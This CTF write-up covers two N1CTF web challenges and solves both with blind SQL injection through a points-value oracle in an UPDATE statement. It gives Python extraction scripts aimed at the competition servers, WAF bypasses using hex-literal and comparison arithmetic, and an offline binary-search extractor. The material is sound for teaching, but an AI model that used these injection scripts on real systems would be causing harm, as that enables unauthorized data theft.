N1CTF WEB

Web sign-in challenge 1: 77777 1

Since the challenge has been taken down, the screenshots here are from other people's writeups.

(screenshots from another writeup)

From another writeup I learned how to build the payload. Because of the WAF, the `%` wildcard is sent as a hex literal: MySQL reads `0x25` as the binary string `%`, so `password like 0x25` means `password LIKE '%'` and matches every row.

```text
flag=1111&hi= where (password like 0x25)
```

In the source code this becomes:

```sql
Update users set points =1111 where (password like 0x25)
```

(screenshot)

The changed points value shows that the UPDATE ran with the injected WHERE clause. That is the oracle: the points shown on the page tell you whether the condition matched the row, which is what the blind-injection script relies on.

Below is the blind-injection script from that writeup (Python 3 version):

```python
import requests
import string
from urllib.parse import unquote

url = "http://47.97.168.223/index.php"
flag = ""        # hex of the characters recovered so far
true_flag = ""   # the same characters, decoded
for i in range(1, 1000):
    payload = flag
    # note: "_" is a single-character LIKE wildcard, so a hit on it says nothing about the real character
    for j in "0123456789" + string.ascii_letters + "!@#$^&*(){}=+`~_":
        data = {
            "flag": "233333",
            # 0x<known prefix><guess>25 is the binary string "<prefix><guess>%", so the server runs
            # UPDATE users SET points=233333 WHERE (password LIKE '<prefix><guess>%')
            "hi": unquote(" where (password like 0x%s25)" % (payload + hex(ord(j))[2:])),
        }
        r = requests.post(url=url, data=data)
        if "233333" in r.text:       # the row matched: the guess is correct
            flag += hex(ord(j))[2:]
            true_flag += j
            print(true_flag)
            # reset points to 1 for every row so the next probe starts from a clean page
            data1 = {"flag": "1", "hi": " where 1"}
            s = requests.post(url=url, data=data1)
            break
    else:
        break   # no character matched: the password has been read completely
```

flag: N1CTF{he3l3locat233}

Web sign-in challenge 2: 77777 2

This challenge is a variant of the previous one; reportedly the page looked the same (I was busy at the time and forgot to look at this one).

It filtered `like`, some digits and a number of other things.

Bypass with arithmetic instead (example):

```sql
select * from users where id=1+(username > "a")
```

Here `username > "a"` evaluates to true, which MySQL treats as the integer 1, so `id = 1 + true` is 2.

That is just an example; the same trick works in the UPDATE statement: the comparison result (0 or 1) is added to the points value, so the points shown on the page reveal whether the comparison was true.

(screenshot)
Script from that writeup (mind the URL encoding of the `+`):

```python
import requests
from urllib.parse import unquote

url = "http://47.52.137.90:20000/index.php"
flag = ""
for i in range(1, 1000):
    before = flag
    for j in range(33, 127):
        # unquote("%2b...") is just "+( pw > '...')"; the server then runs
        # UPDATE users SET points=10+( pw > '<prefix><guess>') and shows 10 or 11.
        # requests form-encodes the "+" as %2B, so it arrives as a plus and not as a space.
        payload = unquote("%%2b( pw > '%s')" % (flag + chr(j)))
        data = {"flag": "10", "hi": payload}
        r = requests.post(url=url, data=data)
        if "| 10<br/>" in r.text:
            # pw is not greater than prefix+chr(j); confirm it is greater than prefix+chr(j-1)
            tmp = unquote("%%2b( pw > '%s')" % (flag + chr(j - 1)))
            tmp_data = {"flag": "10", "hi": tmp}
            s = requests.post(url=url, data=tmp_data)
            if "| 11<br/>" in s.text:
                flag += chr(j - 1)
                print(flag)
            break
    if flag == before:
        break   # no new character was confirmed: stop
```
flag: N1CTF{HAHAH777A7AHA77777AAAA}
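The comparison trick generalizes: any injected expression whose 0/1 result is added to the points value gives a one-bit oracle `pw > probe`, and the probe can be chosen by binary search instead of scanning all 94 printable characters (the LIKE-prefix oracle of challenge 1 is the same loop with a different predicate). The script below is an added example, not from the writeup; it replaces the web server with a local `oracle()` function over a constructed sample secret so the extraction logic runs offline. It also handles the case that the two-probe check in the script above cannot tell apart: when `pw` ends exactly with the guessed character, `pw > prefix+chr(j-1)` is true and `pw > prefix+chr(j)` is false both for "chr(j-1) with more to follow" and for "chr(j) as the last character", so the final character comes back one code point too low (`|` instead of `}`). A third probe with a byte that sorts above every printable character resolves that.

```python
"""Offline model of the challenge-2 oracle: UPDATE users SET points = 10 + (pw > '<probe>'),
with the page showing the resulting points.  Added example: the web target is replaced by a
local function so the extraction can be run and tested without the (now closed) server."""

from typing import Callable, Optional

# Constructed sample secret standing in for the `pw` column of the CTF database.
SECRET = "N1CTF{HAHAH777A7AHA77777AAAA}"


def oracle(probe: str) -> bool:
    """True if the page would show '| 11<br/>' (pw > probe), False for '| 10<br/>'.
    Python compares strings byte-wise, i.e. what MySQL does with a *_bin collation or
    `BINARY pw`; under a *_ci collation upper and lower case compare equal."""
    return SECRET > probe


LOW, HIGH = 31, 126   # just below the printable ASCII range .. '~'
DEL = chr(127)        # sorts above every printable ASCII character


def next_char(prefix: str, greater: Callable[[str], bool]) -> Optional[str]:
    """Recover the character that follows `prefix`, or None when the secret is exactly `prefix`.
    Assumes the secret is printable ASCII and starts with `prefix`."""
    if not greater(prefix + chr(LOW)):
        return None                       # nothing follows prefix: extraction complete
    # binary search for the largest k with secret > prefix + chr(k)
    lo, hi = LOW, HIGH
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if greater(prefix + chr(mid)):
            lo = mid
        else:
            hi = mid - 1
    t = lo
    if t == HIGH:
        return chr(t)                     # next char is '~' with more characters after it
    # Two cases end the search at t: the next char is chr(t) with more characters after it,
    # or the secret ends exactly with chr(t + 1).  A probe with DEL after chr(t) separates them:
    # only in the second case is the secret still greater than prefix + chr(t) + DEL.
    if greater(prefix + chr(t) + DEL):
        return chr(t + 1)                 # last character of the secret
    return chr(t)


def extract(greater: Callable[[str], bool], max_len: int = 256) -> str:
    """Recover the whole secret, one character per round (about 9 probes per character)."""
    found = ""
    for _ in range(max_len):
        c = next_char(found, greater)
        if c is None:
            break
        found += c
    return found


if __name__ == "__main__":
    print(extract(oracle))
```

Against a real target, `oracle()` is the only part that changes: send the probe in `hi` as `+( pw > '<probe>')` and return whether the page shows `| 11<br/>`. Under MySQL's default `*_ci` collations every letter is recovered in a single case, so a flag may need its case fixed up by hand.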